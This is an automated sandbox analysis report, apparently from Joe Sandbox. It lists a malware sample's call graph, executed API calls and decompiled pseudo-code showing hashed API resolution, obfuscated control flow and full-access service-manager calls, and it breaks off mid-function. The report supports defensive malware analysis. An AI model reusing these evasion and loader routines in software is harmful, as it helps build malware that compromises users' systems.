10644->10643 10664 7aa189 10645->10664 10646 7aacd0 GetPEB 10646->10664 10647 7aa552 10650 7aa571 10647->10650 10652 7a3f00 GetPEB 10647->10652 10648 7aa439 10648->10202 10658 7aa599 10650->10658 10660 7a3f00 GetPEB 10650->10660 10651 7a34c0 GetPEB 10651->10664 10654 7aa565 10652->10654 10653 7a4220 GetPEB 10653->10664 10656 7a3e60 GetPEB 10654->10656 10655 7a4b70 2 API calls 10655->10664 10656->10650 10658->10202 10659 7a3f00 GetPEB 10659->10664 10661 7aa58d 10660->10661 10663 7a3e60 GetPEB 10661->10663 10662 7a3460 GetPEB 10662->10664 10663->10658 10664->10646 10664->10647 10664->10648 10664->10651 10664->10653 10664->10655 10664->10659 10664->10662 10665 7a3e60 GetPEB 10664->10665 10734 7ab520 10664->10734 10741 7a1150 10664->10741 10665->10664 10685 7aa7c5 10666->10685 10667 7aaa19 10667->10202 10668 7aacd0 GetPEB 10668->10685 10669 7aaa7c GetCurrentProcessId 10669->10685 10670 7aaacd 10672 7aaaec 10670->10672 10675 7a3f00 GetPEB 10670->10675 10671 7a4b70 2 API calls 10671->10685 10679 7aab14 10672->10679 10680 7a3f00 GetPEB 10672->10680 10677 7aaae0 10675->10677 10676 7a42c0 GetPEB 10676->10685 10678 7a3e60 GetPEB 10677->10678 10678->10672 10679->10202 10683 7aab08 10680->10683 10681 7a3e60 GetPEB 10681->10685 10682 7a3f00 GetPEB 10682->10685 10684 7a3e60 GetPEB 10683->10684 10684->10679 10685->10667 10685->10668 10685->10669 10685->10670 10685->10671 10685->10676 10685->10681 10685->10682 10756 7a49a0 10685->10756 10766 7a4850 10685->10766 10688 7aa5ef 10686->10688 10687 7aa710 10687->10202 10688->10687 10690 7aa731 10688->10690 10691 7a42c0 GetPEB 10688->10691 10693 7a3f00 GetPEB 10688->10693 10694 7a3e60 GetPEB 10688->10694 10775 7a4370 10688->10775 10692 7a3f00 GetPEB 10690->10692 10696 7aa750 10690->10696 10691->10688 10695 7aa744 10692->10695 10693->10688 10694->10688 10697 7a3e60 GetPEB 10695->10697 10698 7aa778 10696->10698 10699 7a3f00 GetPEB 10696->10699 10697->10696 10698->10202 10700 7aa76c 10699->10700 10701 7a3e60 GetPEB 10700->10701 10701->10698 10703 7a4b98 10702->10703 10704 7a4b82 10702->10704 10707 7a4bd7 CreateProcessW 10703->10707 10709 7a3f00 GetPEB 10703->10709 10705 7a3f00 GetPEB 10704->10705 10706 7a4b8c 10705->10706 10708 7a3e60 GetPEB 10706->10708 10710 7a4c73 10707->10710 10711 7a4bf7 10707->10711 10708->10703 10712 7a4bc6 10709->10712 10710->10635 10713 7a4bff 10711->10713 10715 7a4c33 10711->10715 10717 7a3f00 GetPEB 10711->10717 10714 7a3e60 GetPEB 10712->10714 10713->10635 10716 7a4bd2 10714->10716 10720 7a4c5d 10715->10720 10721 7a3f00 GetPEB 10715->10721 10716->10707 10718 7a4c27 10717->10718 10719 7a3e60 GetPEB 10718->10719 10719->10715 10720->10635 10722 7a4c51 10721->10722 10723 7a3e60 GetPEB 10722->10723 10723->10720 10733 7aaced 10724->10733 10725 7aaf9f 10727 7aaf37 10725->10727 10728 7a3f00 GetPEB 10725->10728 10726 7a34c0 GetPEB 10726->10733 10727->10635 10731 7aafb2 10728->10731 10729 7a3f00 GetPEB 10729->10733 10730 7a3e60 GetPEB 10730->10733 10732 7a3e60 GetPEB 10731->10732 10732->10727 10733->10725 10733->10726 10733->10727 10733->10729 10733->10730 10739 7ab536 10734->10739 10735 7ab55f 10735->10664 10736 7ab633 10750 7a4fd0 10736->10750 10737 7a3f00 GetPEB 10737->10739 10739->10735 10739->10736 10739->10737 10740 7a3e60 GetPEB 10739->10740 10740->10739 10743 7a1160 10741->10743 10742 7a124c 10744 7a1244 10742->10744 10746 7a3f00 GetPEB 10742->10746 10743->10742 10743->10744 10745 7a3f00 GetPEB 10743->10745 10749 7a3e60 GetPEB 10743->10749 10744->10664 10745->10743 10747 7a125f 10746->10747 10748 7a3e60 GetPEB 10747->10748 10748->10744 10749->10743 10751 7a4ff9 10750->10751 10752 7a500f 10750->10752 10753 7a3f00 GetPEB 10751->10753 10752->10735 10754 7a5003 10753->10754 10755 7a3e60 GetPEB 10754->10755 10755->10752 10760 7a49c0 10756->10760 10757 7a4b37 10758 7a49ea 10757->10758 10759 7a3f00 GetPEB 10757->10759 10758->10685 10763 7a4b4a 10759->10763 10760->10757 10760->10758 10761 7a3e60 GetPEB 10760->10761 10762 7a34c0 GetPEB 10760->10762 10765 7a3f00 GetPEB 10760->10765 10761->10760 10762->10760 10764 7a3e60 GetPEB 10763->10764 10764->10758 10765->10760 10773 7a4870 10766->10773 10767 7a496e 10768 7a492c 10767->10768 10769 7a3f00 GetPEB 10767->10769 10768->10685 10770 7a4981 10769->10770 10772 7a3e60 GetPEB 10770->10772 10771 7a3f00 GetPEB 10771->10773 10772->10768 10773->10767 10773->10768 10773->10771 10774 7a3e60 GetPEB 10773->10774 10774->10773 10776 7a450e 10775->10776 10777 7a4384 10775->10777 10776->10688 10777->10776 10778 7a3f00 GetPEB 10777->10778 10781 7a43d6 10777->10781 10779 7a43ca 10778->10779 10780 7a3e60 GetPEB 10779->10780 10780->10781 10782 7a3f00 GetPEB 10781->10782 10789 7a4436 10781->10789 10794 7a44f4 10781->10794 10783 7a442a 10782->10783 10785 7a3e60 GetPEB 10783->10785 10784 7a44ba 10795 7a4550 10784->10795 10785->10789 10787 7a3f00 GetPEB 10787->10789 10789->10784 10789->10787 10790 7a3e60 GetPEB 10789->10790 10790->10789 10791 7a3f00 GetPEB 10792 7a44e8 10791->10792 10793 7a3e60 GetPEB 10792->10793 10793->10794 10794->10688 10797 7a44d0 10795->10797 10798 7a456b 10795->10798 10796 7a3e60 GetPEB 10796->10798 10797->10791 10797->10794 10798->10796 10798->10797 10799 7a3f00 GetPEB 10798->10799 10799->10798 10806 7a55c6 10800->10806 10801 7a56a8 10802 7a55e8 10801->10802 10803 7a3f00 GetPEB 10801->10803 10802->10224 10805 7a56bb 10803->10805 10804 7a3f00 GetPEB 10804->10806 10807 7a3e60 GetPEB 10805->10807 10806->10801 10806->10802 10806->10804 10808 7a3e60 GetPEB 10806->10808 10807->10802 10808->10806 10813 7a4ca0 10809->10813 10810 7a4db4 10811 7a4d7c 10810->10811 10812 7a3f00 GetPEB 10810->10812 10811->10224 10814 7a4dc7 10812->10814 10813->10810 10813->10811 10815 7a3e60 GetPEB 10813->10815 10816 7a3f00 GetPEB 10813->10816 10817 7a3e60 GetPEB 10814->10817 10815->10813 10816->10813 10817->10811 10819 7a46d7 10818->10819 10821 7a46ed 10818->10821 10820 7a3f00 GetPEB 10819->10820 10822 7a46e1 10820->10822 10824 7a4760 10821->10824 10825 7a4721 10821->10825 10826 7a3f00 GetPEB 10821->10826 10823 7a3e60 GetPEB 10822->10823 10823->10821 10824->10231 10829 7a4752 10825->10829 10830 7a3f00 GetPEB 10825->10830 10827 7a4715 10826->10827 10828 7a3e60 GetPEB 10827->10828 10828->10825 10829->10231 10831 7a4746 10830->10831 10832 7a3e60 GetPEB 10831->10832 10832->10829 10844 7a25f0 10833->10844 10834 7a2771 10834->10266 10835 7a3f00 GetPEB 10835->10844 10836 7a2912 10837 7a2937 10836->10837 10838 7a3f00 GetPEB 10836->10838 10842 7a295f 10837->10842 10843 7a3f00 GetPEB 10837->10843 10840 7a292b 10838->10840 10839 7a42c0 GetPEB 10839->10844 10841 7a3e60 GetPEB 10840->10841 10841->10837 10842->10266 10846 7a2953 10843->10846 10844->10834 10844->10835 10844->10836 10844->10839 10845 7a3e60 GetPEB 10844->10845 10845->10844 10847 7a3e60 GetPEB 10846->10847 10847->10842 10850 7a1010 10848->10850 10849 7a103a 10849->10293 10850->10849 10851 7a3f00 GetPEB 10850->10851 10852 7a1105 10850->10852 10855 7a3e60 GetPEB 10850->10855 10851->10850 10852->10849 10853 7a3f00 GetPEB 10852->10853 10854 7a1118 10853->10854 10856 7a3e60 GetPEB 10854->10856 10855->10850 10856->10849 10858 7a34c0 GetPEB 10857->10858 10859 7a36c4 10858->10859 10860 7a3f00 GetPEB 10859->10860 10864 7a36e5 10859->10864 10861 7a36d9 10860->10861 10863 7a3e60 GetPEB 10861->10863 10862 7a371a 10868 7a3742 10862->10868 10869 7a3f00 GetPEB 10862->10869 10863->10864 10864->10862 10865 7a3f00 GetPEB 10864->10865 10866 7a370e 10865->10866 10867 7a3e60 GetPEB 10866->10867 10867->10862 10871 7a376e 10868->10871 10873 7a3f00 GetPEB 10868->10873 10870 7a3736 10869->10870 10872 7a3e60 GetPEB 10870->10872 10871->10012 10872->10868 10874 7a3762 10873->10874 10875 7a3e60 GetPEB 10874->10875 10875->10871 10886 7a7712 10876->10886 10877 7a34c0 GetPEB 10877->10886 10878 7a77b3 10879 7a77d2 10878->10879 10881 7a3f00 GetPEB 10878->10881 10879->10381 10880 7a78a3 10880->10381 10882 7a77c6 10881->10882 10883 7a3e60 GetPEB 10882->10883 10883->10879 10884 7a3e60 GetPEB 10884->10886 10885 7a3f00 GetPEB 10885->10886 10886->10877 10886->10878 10886->10880 10886->10884 10886->10885 10887 7a30a0 10888 7a30ba 10887->10888 10889 7a3238 10888->10889 10890 7a32ab 10888->10890 10893 7a3291 RtlAllocateHeap 10888->10893 10895 7a3f00 GetPEB 10888->10895 10896 7a3e60 GetPEB 10888->10896 10890->10889 10891 7a3f00 GetPEB 10890->10891 10892 7a32bf 10891->10892 10894 7a3e60 GetPEB 10892->10894 10893->10888 10893->10889 10894->10889 10895->10888 10896->10888 9651 4197a0 9652 4197e3 __vbaObjSet 9651->9652 9654 419869 9652->9654 9655 419884 __vbaI4Var 9654->9655 9656 41986f __vbaHresultCheckObj 9654->9656 9657 4198a3 9655->9657 9656->9655 9658 4198a9 __vbaHresultCheckObj 9657->9658 9659 4198b8 __vbaFreeObj __vbaFreeVar 9657->9659 9658->9659 9660 4198d3 __vbaObjSet 9659->9660 9661 419915 9660->9661 9662 41991b __vbaHresultCheckObj 9661->9662 9663 41992a __vbaI4Var 9661->9663 9662->9663 9664 419953 9663->9664 9665 419959 __vbaHresultCheckObj 9664->9665 9666 419968 __vbaFreeObj __vbaFreeVar 9664->9666 9665->9666 9667 419983 __vbaObjSet 9666->9667 9668 4199c5 9667->9668 9669 4199cb __vbaHresultCheckObj 9668->9669 9670 4199da __vbaI4Var 9668->9670 9669->9670 9671 419a03 9670->9671 9672 419a09 __vbaHresultCheckObj 9671->9672 9673 419a18 __vbaFreeObj __vbaFreeVar 9671->9673 9672->9673 9674 419a57 9673->9674 9675 419a5d __vbaHresultCheckObj 9674->9675 9676 419a6c __vbaBoolVar 9674->9676 9675->9676 9677 419a86 9676->9677 9678 419aa5 9677->9678 9679 419a8c __vbaHresultCheckObj 9677->9679 9680 419aab __vbaFreeVar 9678->9680 9679->9680 9859 4243a0 9680->9859 9683 419aeb 9685 419b15 __vbaObjSet 9683->9685 9686 419b04 __vbaHresultCheckObj 9683->9686 9684 419add __vbaHresultCheckObj 9684->9683 9688 419b6e 9685->9688 9686->9685 9689 419b83 __vbaCastObjVar __vbaObjSet 9688->9689 9690 419b74 __vbaHresultCheckObj 9688->9690 9691 419bb5 9689->9691 9690->9689 9692 419bbb __vbaHresultCheckObj 9691->9692 9693 419bcd __vbaFreeObjList __vbaFreeVarList 9691->9693 9692->9693 9694 419bfd __vbaObjSet 9693->9694 9695 419c3f 9694->9695 9696 419c45 __vbaHresultCheckObj 9695->9696 9697 419c54 __vbaStrVarVal 9695->9697 9696->9697 9698 419c7a 9697->9698 9699 419c80 __vbaHresultCheckObj 9698->9699 9700 419c92 __vbaFreeStr __vbaFreeObj __vbaFreeVar 9698->9700 9699->9700 9701 419cf3 9700->9701 9702 419cf9 __vbaHresultCheckObj 9701->9702 9703 419d0e __vbaI2Var __vbaFreeVar 9701->9703 9702->9703 9704 419d5a 9703->9704 9705 419d60 __vbaHresultCheckObj 9704->9705 9706 419d75 __vbaI2Var __vbaFreeVar 9704->9706 9705->9706 9707 419dc3 9706->9707 9708 419dc9 __vbaHresultCheckObj 9707->9708 9709 419dde __vbaI2Var __vbaFreeVar 9707->9709 9708->9709 9710 419e2c 9709->9710 9711 419e32 __vbaHresultCheckObj 9710->9711 9712 419e47 __vbaI2Var __vbaFreeVar 9710->9712 9711->9712 9713 419e95 9712->9713 9714 419eb0 __vbaI2Var __vbaFreeVar 9713->9714 9715 419e9b __vbaHresultCheckObj 9713->9715 9716 419efe 9714->9716 9715->9714 9717 419f04 __vbaHresultCheckObj 9716->9717 9718 419f19 __vbaBoolVar __vbaFreeVar 9716->9718 9717->9718 9719 419f67 9718->9719 9720 419f82 __vbaBoolVar __vbaFreeVar 9719->9720 9721 419f6d __vbaHresultCheckObj 9719->9721 9722 419fd0 9720->9722 9721->9720 9723 419fd6 __vbaHresultCheckObj 9722->9723 9724 419feb __vbaI2Var __vbaFreeVar __vbaI4Str __vbaI4Str 9722->9724 9723->9724 9869 410a44 9724->9869 9726 41a027 __vbaSetSystemError 9727 41a076 9726->9727 9728 41a091 __vbaBoolVar __vbaFreeVar 9727->9728 9729 41a07c __vbaHresultCheckObj 9727->9729 9730 41a0df 9728->9730 9729->9728 9731 41a0e5 __vbaHresultCheckObj 9730->9731 9732 41a0fa __vbaI2Var __vbaFreeVar 9730->9732 9731->9732 9733 4240c0 __vbaVarVargNofree __vbaI4Var 9732->9733 9734 41a128 9733->9734 9735 41a142 __vbaSetSystemError __vbaFreeVar 9734->9735 9736 41a18b 9735->9736 9737 41a191 __vbaHresultCheckObj 9736->9737 9738 41a1a6 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9736->9738 9737->9738 9739 41a212 9738->9739 9740 41a218 __vbaHresultCheckObj 9739->9740 9741 41a22d __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9739->9741 9740->9741 9742 41a299 9741->9742 9743 41a2b4 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9742->9743 9744 41a29f __vbaHresultCheckObj 9742->9744 9745 41a2ff 9743->9745 9746 41a2ef __vbaNew2 9743->9746 9744->9743 9747 41a373 9745->9747 9748 41a35e __vbaHresultCheckObj 9745->9748 9746->9745 9749 41a38c 9747->9749 9750 41a37c __vbaNew2 9747->9750 9748->9747 9751 41a405 __vbaHresultCheckObj 9749->9751 9752 41a41a __vbaVar2Vec __vbaRefVarAry __vbaUbound 9749->9752 9750->9749 9751->9752 9753 422660 13 API calls 9752->9753 9754 41a449 __vbaErase __vbaAryMove __vbaFreeVarList 9753->9754 9755 41a4cb 9754->9755 9756 41a4d1 __vbaHresultCheckObj 9755->9756 9757 41a4e6 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9755->9757 9756->9757 9758 41a550 9757->9758 9759 41a556 __vbaHresultCheckObj 9758->9759 9760 41a56b __vbaBoolVar __vbaFreeVar 9758->9760 9759->9760 9761 41d540 26 API calls 9760->9761 9762 41a58c 9761->9762 9763 41bc40 94 API calls 9762->9763 9764 41a596 9763->9764 9765 41bc40 94 API calls 9764->9765 9766 41a5a0 9765->9766 9767 41bc40 94 API calls 9766->9767 9768 41a5aa 9767->9768 9769 4229f0 75 API calls 9768->9769 9770 41a5b5 9769->9770 9771 41a5f2 __vbaHresultCheckObj 9770->9771 9772 41a607 __vbaBoolVar __vbaFreeVar 9770->9772 9771->9772 9773 41a655 9772->9773 9774 41a670 __vbaBoolVar __vbaFreeVar 9773->9774 9775 41a65b __vbaHresultCheckObj 9773->9775 9776 4240c0 __vbaVarVargNofree __vbaI4Var 9774->9776 9775->9774 9777 41a6a9 9776->9777 9778 41a90e __vbaErrorOverflow 9777->9778 9779 4240c0 __vbaVarVargNofree __vbaI4Var 9777->9779 9780 41a960 9778->9780 9781 41a6c2 9779->9781 9782 41abd6 __vbaObjSet 9780->9782 9783 41a97b __vbaObjSet 9780->9783 9781->9778 9784 41a6ca 9781->9784 9790 41abfc 9782->9790 9789 41a9a1 9783->9789 9787 41a6d5 __vbaFreeVarList 9784->9787 9788 41a719 9787->9788 9793 41a71f __vbaHresultCheckObj 9788->9793 9794 41a72e __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9788->9794 9795 41a9c0 9789->9795 9796 41a9a7 __vbaHresultCheckObj 9789->9796 9791 41ac02 __vbaHresultCheckObj 9790->9791 9792 41ac1b 9790->9792 9791->9792 9801 41ac42 __vbaFreeObj 9792->9801 9802 41ac34 __vbaHresultCheckObj 9792->9802 9793->9794 9797 41a767 __vbaObjSet 9794->9797 9798 41a7a9 9794->9798 9803 41a9e7 __vbaFreeObj 9795->9803 9804 41a9d9 __vbaHresultCheckObj 9795->9804 9796->9795 9808 41a788 9797->9808 9857 415d80 105 API calls 9798->9857 9858 40f5dc 9798->9858 9800 41a7b2 __vbaAryLock 9805 41a7c9 9800->9805 9806 41a7e8 __vbaGenerateBoundsError 9800->9806 9810 41ac54 __vbaObjSet 9801->9810 9802->9801 9813 41a9f9 __vbaObjSet 9803->9813 9804->9803 9805->9806 9809 41a7cf 9805->9809 9807 41a7e4 9806->9807 9815 41a7fc __vbaAryUnlock 9807->9815 9811 41a7a0 __vbaFreeObj 9808->9811 9812 41a78e __vbaHresultCheckObj 9808->9812 9809->9807 9814 41a7db __vbaGenerateBoundsError 9809->9814 9819 41ac71 9810->9819 9811->9798 9812->9811 9816 41aa13 9813->9816 9814->9807 9817 41a81f 9815->9817 9818 41a80f __vbaNew2 9815->9818 9820 41aa27 __vbaObjSet 9816->9820 9821 41aa19 __vbaHresultCheckObj 9816->9821 9822 41a83e __vbaObjSetAddref 9817->9822 9823 41a82e __vbaNew2 9817->9823 9818->9817 9824 41ac77 __vbaHresultCheckObj 9819->9824 9825 41ac88 9819->9825 9832 41aa4d 9820->9832 9821->9820 9827 41a856 9822->9827 9823->9822 9824->9825 9830 41aca9 __vbaFreeObj 9825->9830 9831 41ac9b __vbaHresultCheckObj 9825->9831 9828 41a86b __vbaFreeObj 9827->9828 9829 41a85c __vbaHresultCheckObj 9827->9829 9833 41a8d6 __vbaAryDestruct __vbaFreeVar 9828->9833 9829->9828 9837 41acb2 9830->9837 9831->9830 9834 41aa53 __vbaHresultCheckObj 9832->9834 9835 41aa64 9832->9835 9834->9835 9836 41ad0b 9835->9836 9838 41aa95 __vbaFreeObjList 9835->9838 9839 41aa87 __vbaHresultCheckObj 9835->9839 9836->9836 9840 41aab1 __vbaObjSet 9838->9840 9839->9838 9841 41aace 9840->9841 9842 41aae5 9841->9842 9843 41aad4 __vbaHresultCheckObj 9841->9843 9844 41ab06 __vbaFreeObj 9842->9844 9845 41aaf8 __vbaHresultCheckObj 9842->9845 9843->9842 9846 41ab18 __vbaObjSet 9844->9846 9845->9844 9847 41ab32 9846->9847 9848 41ab46 __vbaObjSet 9847->9848 9849 41ab38 __vbaHresultCheckObj 9847->9849 9851 41ab68 __vbaObjSet 9848->9851 9849->9848 9852 41ab7b 9851->9852 9853 41ab81 __vbaHresultCheckObj 9852->9853 9854 41ab8c 9852->9854 9853->9854 9854->9836 9855 41abba __vbaFreeObjList 9854->9855 9856 41abaf __vbaHresultCheckObj 9854->9856 9855->9837 9856->9855 9857->9800 9858->9800 9860 4243db __vbaI2I4 9859->9860 9871 4240c0 __vbaVarVargNofree __vbaI4Var 9860->9871 9863 424414 9872 4240c0 __vbaVarVargNofree __vbaI4Var 9863->9872 9865 42441f 9866 424426 __vbaFreeVarList 9865->9866 9867 42446e __vbaErrorOverflow 9865->9867 9868 419aca 9866->9868 9868->9683 9868->9684 9870 410a4d 9869->9870 9871->9863 9872->9865 10919 7a3780 10920 7a3795 10919->10920 10923 7a37ab 10919->10923 10921 7a3f00 GetPEB 10920->10921 10922 7a379f 10921->10922 10924 7a3e60 GetPEB 10922->10924 10925 7a37dd 10923->10925 10926 7a3f00 GetPEB 10923->10926 10924->10923 10928 7a3812 10925->10928 10930 7a3f00 GetPEB 10925->10930 10927 7a37d1 10926->10927 10929 7a3e60 GetPEB 10927->10929 10933 7a384a 10928->10933 10934 7a3f00 GetPEB 10928->10934 10929->10925 10931 7a3806 10930->10931 10932 7a3e60 GetPEB 10931->10932 10932->10928 10936 7a3876 10933->10936 10938 7a3f00 GetPEB 10933->10938 10935 7a383e 10934->10935 10937 7a3e60 GetPEB 10935->10937 10941 7a38d1 SHFileOperationW 10936->10941 10942 7a3f00 GetPEB 10936->10942 10937->10933 10939 7a386a 10938->10939 10940 7a3e60 GetPEB 10939->10940 10940->10936 10943 7a38c0 10942->10943 10944 7a3e60 GetPEB 10943->10944 10945 7a38cc 10944->10945 10945->10941

                                                                                Executed Functions

                                                                                Function 00620400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00620448
                                                                                  • Part of subcall function 00621140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00620EFD,00000000), ref: 00621155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00620463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00620484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0062048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00620492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0062049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 006204A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 006204B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 006204E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 006204F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00620519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00620530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00620547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00620562
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: e42cda73825b6b6e1ea8cfb215804bc5f9cf1969b644d3734f5b854b21590169
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 694182B1908720AEE750EB61D846FAFB3EEAFD9740F008D1CB7449B241DA74D9048F66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A9860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 524 7a9860-7a9878 525 7a9880-7a9885 524->525 526 7a988b 525->526 527 7a99e2-7a99e7 525->527 528 7a998e-7a9995 526->528 529 7a9891-7a9896 526->529 530 7a99ed 527->530 531 7a9ae3-7a9ae8 527->531 532 7a99b2-7a99c1 OpenSCManagerW 528->532 533 7a9997-7a99ad call 7a3f00 call 7a3e60 528->533 534 7a989c 529->534 535 7a9936-7a993b 529->535 538 7a9a73-7a9a7a 530->538 539 7a99f3-7a99f8 530->539 536 7a9aea-7a9aef 531->536 537 7a9b02-7a9b09 531->537 543 7a99d8-7a99dd 532->543 544 7a99c3-7a99d3 532->544 533->532 545 7a98a2-7a98a7 534->545 546 7a9927-7a9931 call 7a7c60 534->546 535->536 547 7a9941-7a9949 535->547 536->525 548 7a9af5-7a9b01 536->548 549 7a9b0b-7a9b21 call 7a3f00 call 7a3e60 537->549 550 7a9b26-7a9b44 SHGetFolderPathW call 7a3040 537->550 541 7a9a7c-7a9a92 call 7a3f00 call 7a3e60 538->541 542 7a9a97-7a9aa2 538->542 551 7a99fa-7a99ff 539->551 552 7a9a42-7a9a49 539->552 541->542 579 7a9abf-7a9ad0 542->579 580 7a9aa4-7a9aba call 7a3f00 call 7a3e60 542->580 543->525 544->525 562 7a98a9-7a98ae 545->562 563 7a9905-7a9922 545->563 546->525 559 7a994b-7a9963 call 7a3f00 call 7a3e60 547->559 560 7a9969-7a9989 SHGetFolderPathW 547->560 549->550 567 7a9b49 550->567 551->536 553 7a9a05-7a9a3d 551->553 554 7a9a4b-7a9a61 call 7a3f00 call 7a3e60 552->554 555 7a9a66-7a9a6e CloseServiceHandle 552->555 553->525 554->555 555->525 559->560 560->525 562->536 573 7a98b4-7a98bb 562->573 563->525 576 7a9b4c-7a9b58 567->576 582 7a98d8-7a9900 call 7a3d00 573->582 583 7a98bd-7a98d3 call 7a3f00 call 7a3e60 573->583 579->576 599 7a9ad2-7a9ade 579->599 580->579 582->525 583->582 599->525
                                                                                C-Code - Quality: 73%
                                                                                			E007A9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x7ae310;
							if( *0x7ae310 == 0) {
								 *0x7ae310 = E007A3E60(_t64, E007A3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x7ae54c; // 0x8df0b0
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x7adbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E007A3E60(_t64, E007A3F00(0xd9518805), 0x141622d6, _t94);
										 *0x7adbd8 = _t69;
									}
									_t53 =  *0x7ae54c; // 0x8df0b0
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E007A7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x7ae3f4;
											if(_t60 == 0) {
												_t60 = E007A3E60(_t64, E007A3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x7ae3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E007A3D00( &_v536);
											_t72 =  *0x7ae54c; // 0x8df0b0
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x7adbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E007A3E60(_t64, E007A3F00(0xd9518805), 0x141622d6, _t94);
								 *0x7adbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x7ae54c; // 0x8df0b0
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E007A3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x7ae494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E007A3E60(_t64, E007A3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x7ae494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x7add18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E007A3E60(_t64, E007A3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x7add18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x7ae54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E007A7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
